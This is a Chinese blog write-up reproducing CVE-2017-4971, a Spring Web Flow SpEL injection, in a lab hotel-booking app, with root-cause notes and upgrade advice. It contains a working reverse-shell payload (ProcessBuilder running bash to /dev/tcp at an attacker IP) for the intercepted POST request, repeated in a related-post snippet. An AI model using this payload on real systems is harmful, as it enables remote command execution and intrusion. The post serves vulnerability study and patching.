spring 代码执行 (CVE-2017-4971)复现

最新推荐文章于 2024-07-24 15:40:36 发布
最新推荐文章于 2024-07-24 15:40:36 发布
阅读量1k 收藏 5
点赞数 2
分类专栏: 漏洞复现 文章标签: spring 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121259415
版权

spring 代码执行 CVE-2017-4971


所有文章,仅供安全研究与学习之用,后果自负!

spring 代码执行 (CVE-2017-4971)

0x01 漏洞描述

Spring Web Flow建立在Spring MVC之上,并允许实现Web应用程序的“流” 由于没有明确指定相关 model 的具体属性导致从表单可以提交恶意的表达式从而被执行,导致任意代码执行的漏洞
详细漏洞分析

https://paper.seebug.org/322/

0x02 影响范围

Spring Web Flow 2.4.0 – 2.4.4
注:官方停止支持的更早的版本也受影响。

不受影响的版本
Spring Web Flow 2.4.5

0x03 漏洞复现

(1) 访问靶场
在这里插入图片描述
点击左上角login
(2)
在这里插入图片描述
用左边给出的账号进行登录

在这里插入图片描述

(3)
点击观看酒店

在这里插入图片描述

点击订购酒店
在这里插入图片描述

按需求填好后 点击 proceed 继续
在这里插入图片描述

点击confirm前 开启抓包
在这里插入图片描述

反弹shell

post 请求包中 加入如下payload

&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub

攻击机 监听端口
放包
在这里插入图片描述
反弹shell成功
在这里插入图片描述

原理
就是在订阅酒店处,存在一个命令执行,直接调用了两个函数,这两个函数,一个是:addDefaultMappings ,一个是 addModelBindings。

其中,直接控制field这个值的函数是addDefaultMappings,且未做过滤,而addModelBindings是直接获取的java的一个配置文件,由配置文件来确定是否有 binder 节点,如果有,就无法触发代码执行。所以条件有两个:

(1)binder节点为空;

(2) useSpringBeanBinding 默认值(false)未修改。

由此可实际在代码中找到该页面,节点为空(代替命令执行语句)+默认值为false(点击Confirm按钮)

0x04 漏洞修复

建议相关版本的用户采取如下措施进行缓解

2.4.x用户升级到2.4.5
建议在视图状态中始终使用显式数据绑定声明, 以防止表单提交在不应设置的目标对象上设置字段。
Spring Web Flow with JSF 的用户不受到影响.

LuckyCharm~
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【vulhub】Spring WebFlow 远程代码执行漏洞(CVE-2017-4971)漏洞复现
qq_45300786的博客
08-01 1172
漏洞详情 Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。 影响版本 Spring WebFlow 2.4.0 - 2.4.4 测试环境 运行测试环境: 靶机: 192.168.100.23 攻击机: 192.168.100.23 docker-compose up -d 然后访问id为1的酒店htt
vulhub中springCVE-2017-4971漏洞复现
yougexiaojiuguan的博客
12-02 764
漏洞复现过程中的记录,也是为了方便自己
记录一次vulhub:spring 代码执行漏洞复现CVE-2017-4971
sszsNo1的博客
06-29 123
vulhub:spring 代码执行漏洞复现CVE-2017-4971
spring 代码执行 (CVE-2017-4971)
qq_23003811的博客
07-17 94
Spring Web Flow建立在Spring MVC之上,并允许实现Web应用程序的“流”,由于没有明确指定相关 model 的具体属性导致从表单可以提交恶意的表达式从而被执行,导致任意代码执行的漏洞。6、随便填写信息后,点击Proceed。7、打开burp,点击Confirm。8、获取到提交的数据包,发到重放器。9、构造payload进行反弹连接。3、点击Find Hotels。4、点击View Hotel。5、点击Book Hotel。2、根据给定的账号进行登录。1、访问首页并登录。
Spring WebFlow 远程代码执行漏洞(CVE-2017-4971)——漏洞复现
weixin_42090431的博客
11-27 157
(new+java.lang.ProcessBuilder("bash","-c","bash+-i>%26+/dev/tcp/你的IP/21+0>%261")).start()=vulhub。等待环境启动后,访问`http://your-ip:8080`,将看到一个酒店预订的页面,这是spring-webflow官方给的简单示例。
spring(CVE-2018-1273)远程代码执行漏洞复现
热门推荐
勤劳的码农的博客
03-12 1万+
Spring Data 是Spring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
Spring WebFlow-远程代码执行漏洞(CVE-2017-4971
qq_43381463的博客
04-11 630
Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行
CVE-2017-4971-Spring Web Flow RCE漏洞复现
m0_58596609的博客
04-21 2600
CVE-2017-4971-Spring Web Flow RCE漏洞复现
spring框架远程代码执行漏洞(CVE-2017-4971)
Z_l123的博客
03-17 5504
漏洞影响 影响版本:Spring WebFlow 2.4.0 - 2.4.4 漏洞复现 搭建漏洞环境并访问 点击左上角登录,使用左边给的用户名密码登录 登录后 访问 id=1的酒店http://your-ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Proceed” 点击confirm时,进行抓包 使用如下反弹shell的Payload &_(new+java.lang.ProcessBuilder("b.
CVE-2017-4971分析1
08-03
CVE-2017-4971 是一个影响Spring Webflow框架的安全漏洞,主要涉及到SpEL(Spring Expression Language)注入,允许攻击者通过精心构造的HTTP请求执行任意系统命令。此漏洞发生在Spring Webflow 2.0及更高版本中,...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
CVE-2018-3191利用exp
01-08
这是一个远程代码执行漏洞,影响了Oracle WebLogic Server的多个版本,包括但不限于10.3.6.0。当WebLogic服务器处理特定类型的JNDI反序列化请求时,恶意构造的数据可能导致服务器执行攻击者控制的代码。这种攻击通常...
CVE-2020-5398:VE CVE-2020-5398-Spring MVC的RFD(反射文件下载)攻击
04-15
CVE-2020-5398-Spring MVC的RFD(反射文件下载)攻击 在Spring Framework(版本低于5.2.3的5.2.x,版本5.1.13的5.1.x和版本5.0.16的5.0.x)中,应用程序在受到攻击时很容易受到反射文件下载(RFD)攻击在响应中设置...
SpringBoot整合Elastic-Job 2.1.53版本任务调度,手动任务,动态添加任务演示
小哇
07-23 377
zookeeper安装并成功运行。
SpringBoot启动命令过长
tiantiantbtb的博客
07-24 321
Error running 'DromaraApplication': Command line is too long. Shorten command line for DromaraApplication or also for Spring Boot default configuration?
spring-from表单
weixin_51482243的博客
07-22 910
2.Controller定义的接口指定consumes,produces对应的是客户端请求header的Content-Type,Accept;标记在方法上,对应接口的第2层地址;500是请求头Accept=text/plain,接口代码produces=MediaType.TEXT_PLAIN_VALUE,但代码响应是某类的对象;3.面试题/接口文档-要求请求参数是int类型,测试请求参数时还是字符串,但开发的代码需要类型转换,如@RequestParam(name="xx")Integer xx,
Spring Security学习笔记(二)Spring Security认证和鉴权
最新发布
飞!!!的博客
07-24 672
用户认证的基础Filter,只有UsernamePasswordAuthenticationFilter这一个实现类。...//主要方法//先校验请求url与表单校验提交的url是否一致,不一致执行下一个Filter//一致的话就执行认证逻辑,一般默认的表单提交url是"/login"if (!} else {try {//实现类执行具体的认证逻辑return;//由子类实现具体的验证逻辑...
CVE-2017-8464 python复现代码
06-13
CVE-2017-8464是Windows Shell中的一个漏洞,可以被利用来执行恶意代码。以下是Python的复现代码: ```python import os import sys # 首先检查是否为Windows系统 if not sys.platform.startswith('win'): print...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值